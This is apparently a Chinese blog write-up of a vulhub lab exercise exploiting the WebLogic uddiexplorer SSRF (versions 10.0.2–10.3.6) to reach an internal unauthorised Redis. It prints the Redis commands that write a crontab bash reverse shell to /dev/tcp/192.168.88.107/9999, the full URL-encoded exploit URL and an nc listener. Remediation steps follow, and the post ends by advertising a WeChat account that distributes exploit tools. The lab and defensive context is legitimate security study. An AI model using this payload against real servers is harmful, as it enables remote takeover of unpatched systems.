最近在打vulhub的靶场记录一下，我是小菜鸡一个，不对的地方还请指教。废话不多说开始。

原因:

ip:7001/uddiexplorer/SearchPublicRegistries.jsp传参时未做过滤导致ssrf漏洞产生，导致可以对内网的服务进行扫描&攻击。

影响版本：

weblogic 10.0.2–10.3.6版本

验证过程：

1.使用nmap进行扫描，得到服务类型和端口号，对目标进行weblogic扫描，发现存在ssrf 漏洞。

2.手工进行验证，使用burp进行抓包，修改operator参数为http://127.0.0.1:7001如果开启本机开启7001端口则会返回404，输入不存在的端口则会返回：but could not connect over HTTP to server，输入一个存在的端口并且不是http协议的则会返回： which did not have a valid SOAP content-type

3.通过爆破内网地址及常用端口得到，内网中存在redis服务端口(6379)，并且存在未授权漏洞，可以利用redis反弹shell。

4.以下内容使用url编码进行，将ip端口修改为自己的

testset 1 "\n* * * * * root bash -i >& /dev/tcp/192.168.88.107/9999 0>&1\n"
config set dir /etc/
config set dbfilename crontab
saveqwesanx

5.拼接进数据包中，并且使用nc开启监听（nc -lvvp 9999）,稍等一会就可以得到反弹 的shell。

6.可以使用GET方式进行利用，效果一样

http://192.168.88.108:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:7001&rdoSearch=name&txtSearchname=123&txtSearchkey=123&txtSearchfor=123&selfor=Business+location&btnSubmit=Search

http://192.168.88.108:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.20.0.2:6379/test%0a%0aset%201%20%22%5cn%2a%20%2a%20%2a%20%2a%20%2a%20root%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192%2e168%2e88%2e107%2f9999%200%3E%261%5cn%22%0aconfig%20set%20dir%20%2fetc%2f%0aconfig%20set%20dbfilename%20crontab%0asave%0a%0aqwesanx%20&rdoSearch=name&txtSearchname=123&txtSearchkey=123&txtSearchfor=123&selfor=Business+location&btnSubmit=Search

修复方式：

1.在不影响业务的情况下，删除server/lib/uddiexplorer.war下的相应jsp文件。 

#> jar -xvf uddiexplorer.war

#> rm jsp-files

#> jar -cvfM uddiexplorer.war uddiexplorer/

2.配置访问权限，取消对外开放

3.升级高版本。

关注公众号Sanx白帽子 发送 ssrf 获取对应的利用工具